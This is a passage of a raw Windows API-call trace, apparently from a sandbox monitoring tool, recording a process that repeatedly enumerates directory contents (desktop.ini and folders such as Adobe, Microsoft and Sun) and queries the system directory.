nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XT1RPYG9", cAlternateFileName="")) returned 1 [0147.717] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.717] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0147.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0147.718] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.718] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.718] CoTaskMemFree (pv=0x4e1c10) [0147.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.737] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.737] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.738] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.739] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0147.739] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.739] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.739] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.739] CoTaskMemFree (pv=0x4e1c10) [0147.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.741] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.741] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.741] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.741] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.742] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.742] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.743] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0147.743] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.743] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.743] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.743] CoTaskMemFree (pv=0x4e1c10) [0147.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.745] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.745] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.746] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.747] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0147.747] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.747] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.747] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.747] CoTaskMemFree (pv=0x4e1c10) [0147.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.749] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.750] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.750] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.750] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.751] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.751] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.752] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd97b1de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97b1de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97b1de0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0147.752] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.752] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.752] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.752] CoTaskMemFree (pv=0x4e1c10) [0147.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.754] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x874c95a0, ftCreationTime.dwHighDateTime=0x1d4d5ae, ftLastAccessTime.dwLowDateTime=0x874c95a0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x874c95a0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.754] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x874c95a0, ftCreationTime.dwHighDateTime=0x1d4d5ae, ftLastAccessTime.dwLowDateTime=0x874c95a0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x874c95a0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.755] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x874c95a0, ftCreationTime.dwHighDateTime=0x1d4d5ae, ftLastAccessTime.dwLowDateTime=0x874c95a0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x874c95a0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.755] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x874c95a0, ftCreationTime.dwHighDateTime=0x1d4d5ae, ftLastAccessTime.dwLowDateTime=0x874c95a0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x874c95a0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.755] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.755] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.756] CoTaskMemFree (pv=0x4e1c10) [0147.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0147.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af168) returned 1 [0147.760] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.760] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.760] CoTaskMemFree (pv=0x4e1c10) [0147.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0147.761] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0147.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0147.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0147.763] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.763] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.763] CoTaskMemFree (pv=0x4e1c10) [0147.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0147.764] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.764] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0147.764] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0147.765] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", 